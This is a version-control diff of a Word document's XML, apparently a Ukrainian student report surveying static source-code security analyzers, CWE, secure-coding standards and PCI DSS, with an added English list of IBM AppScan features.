+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18686,9 +19566,41 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>V</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">7: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>Вимоги до криптографії та шифування</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19060,7 +19972,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">помилок у вихідних кодах. Всі продукти, спрямовані на аналіз вихідного коду, можна умовно розділити на три типи: </w:t>
+        <w:t xml:space="preserve">помилок у вихідних кодах. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Всі продукти, спрямовані на аналіз вихідного коду, можна умовно розділити на три типи: </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19272,18 +20195,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ідносяться до змішаних типів і виконують функції з аналізу широкого спектра програмних продуктів - веб-додатків, вбудованого коду і звичайного програмного забезпечення. Проте в даному огляді упор зроблений на застосування аналізаторів замовниками </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">розробки, тому більша увага приділяється аналізатора веб-додатків і вбудованого коду. Аналізатори можуть містити </w:t>
+        <w:t xml:space="preserve">ідносяться до змішаних типів і виконують функції з аналізу широкого спектра програмних продуктів - веб-додатків, вбудованого коду і звичайного програмного забезпечення. Проте в даному огляді упор зроблений на застосування аналізаторів замовниками розробки, тому більша увага приділяється аналізатора веб-додатків і вбудованого коду. Аналізатори можуть містити </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -19358,7 +20270,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів </w:t>
+        <w:t xml:space="preserve">. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -19424,7 +20347,19 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>ітом, що відбивається в базах вразливостей аналізаторів. Велика частина аналізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей (</w:t>
+        <w:t>ітом, що відбивається в базах вразливостей аналізаторів. Велика частина ан</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>алізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей (</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -19466,18 +20401,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">.). Як результатів роботи все аналізатори видають звіт про виявлені вразливості і помилки програмування, додатково деякі аналізатори надають функції по автоматичному виправленню помилок. Варто зазначити, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">що автоматичне виправлення помилок не завжди працює коректно, тому даний функціонал призначений тільки для розробників веб-додатків і вбудованих модулів, замовник продукту повинен спиратися тільки на фінальний звіт аналізатора і використовувати отримані дані для прийняття </w:t>
+        <w:t xml:space="preserve">.). Як результатів роботи все аналізатори видають звіт про виявлені вразливості і помилки програмування, додатково деякі аналізатори надають функції по автоматичному виправленню помилок. Варто зазначити, що автоматичне виправлення помилок не завжди працює коректно, тому даний функціонал призначений тільки для розробників веб-додатків і вбудованих модулів, замовник продукту повинен спиратися тільки на фінальний звіт аналізатора і використовувати отримані дані для прийняття </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -19520,6 +20444,7 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5940425" cy="2083489"/>
@@ -19732,8 +20657,9 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ідтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація </w:t>
-      </w:r>
+        <w:t xml:space="preserve">ідтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від світових експертів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19742,41 +20668,40 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> області розробки і захисту програмного забезпечення. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Дані документи безпосередньо не описують помилки програмування, на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від світових експертів </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> області розробки і захисту програмного забезпечення. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Дані документи безпосередньо не описують помилки програмування, на відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
+        <w:t>відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -24096,7 +25021,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1553A869-C504-4D0B-ABD7-9F79D4F68ADF}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4395E903-DD3A-45BC-ABA8-21B58D6983CC}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

</xml_diff>

<commit_message>
with owasp description + full life cycle v2
</commit_message>
<xml_diff>
--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -24438,8 +24438,11 @@
         <w:ind w:left="360" w:firstLine="348"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -24670,68 +24673,946 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>ім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраст</w:t>
+        <w:t>ім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраструктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продукті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="348"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AppScan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Main features in Appscan:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>The Rational Appscan 8.5 Standard edition has many new features, most of which I cover in the brief outline below:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Flash support: Appscan 8.0 has increased flash support compared to its earlier versions. It can now explore and test applications based on an Adobe Flex framework. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>AMF protocol is also supported.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Glass box testing: Glass box scanning is a new feature introduced in Appscan. This process installs an agent on the server which helps find hidden URLs and additional issues.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Web services scanning: Web service scanning is one area which organizations are looking for a more effective automated support, and Appscan has scored well in this area.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Java script security </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>analyzer :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Appscan has introduced JavaScript security analyser which analyses the crawled html pages for vulnerabilities and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>allows users to focus on different client-side issues and DOM (document object model) based XSS problems.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Reporting: Based on your requirements, you can generate reports in desired formats and include desired fields in it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Remediation support: For the identified vulnerabilities, the program provides a description of the issue along with the remediation notes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Customizable scanning policies: Appscan comes with a set of defined scanning policies. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
